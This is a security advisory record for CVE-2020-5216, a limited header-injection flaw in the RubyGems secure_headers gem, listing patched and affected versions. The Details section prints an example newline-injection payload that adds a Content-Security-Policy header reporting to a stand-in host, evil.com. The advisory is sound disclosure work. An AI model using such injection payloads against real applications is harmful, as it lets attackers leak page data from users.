GHSA-w978-rmpf-qmwg

Source

https://github.com/advisories/GHSA-w978-rmpf-qmwg

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-w978-rmpf-qmwg

Aliases

CVE-2020-5216

Published

2020-01-23T02:27:53Z

Modified

2023-11-08T04:03:51.432736Z

Severity

4.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N CVSS Calculator

Summary

Limited header injection when using dynamic overrides with user input in RubyGems secure_headers

Details

Impact

If user-supplied input was passed into append/overridecontentsecuritypolicydirectives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`

would result in

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header

Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

Workarounds

override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])

References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies

For more information

If you have any questions or comments about this advisory: * Open an issue in this repo * DM us at @ndm on twitter

References

Affected packages

RubyGems / secure_headers

Package

Name: secure_headers
Purl: pkg:gem/secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

6.0.0

Fixed

6.3.0

Affected versions

6.*

6.0.0

6.1.0

6.1.1

6.1.2

6.2.0

RubyGems / secure_headers

Package

Name: secure_headers
Purl: pkg:gem/secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

5.0.0

Fixed

5.2.0

Affected versions

5.*

5.0.1

5.0.2

5.0.3

5.0.4

5.0.5

5.1.0

RubyGems / secure_headers

Package

Name: secure_headers
Purl: pkg:gem/secure_headers

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.9.0

Affected versions

0.*

0.1.0

0.1.1

0.2.0

0.2.1

0.3.0

0.4.0

0.4.1

0.4.2

0.4.3

0.5.0

1.*

1.0.0

1.1.0

1.1.1

1.2.0

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.4.0

1.4.1

2.*

2.0.0.pre

2.0.0.pre2

2.0.0

2.0.1

2.0.2

2.1.0

2.2.0

2.2.1

2.2.2

2.2.3

2.2.4

2.3.0

2.4.0

2.4.1

2.4.2

2.4.3

2.4.4

2.5.0

2.5.1

2.5.2

2.5.3

3.*

3.0.0.pre

3.0.0.pre1

3.0.0.pre2

3.0.0.pre3

3.0.0.rc1

3.0.0

3.0.1

3.0.2

3.0.3

3.1.0

3.1.1

3.1.2

3.2.0

3.3.0

3.3.1

3.3.2

3.4.0

3.4.1

3.5.0.pre

3.5.0

3.5.1

3.6.0

3.6.1

3.6.2

3.6.3

3.6.4

3.6.5

3.6.6

3.6.7

3.7.0

3.7.1

3.7.2

3.7.3

3.7.4

3.8.0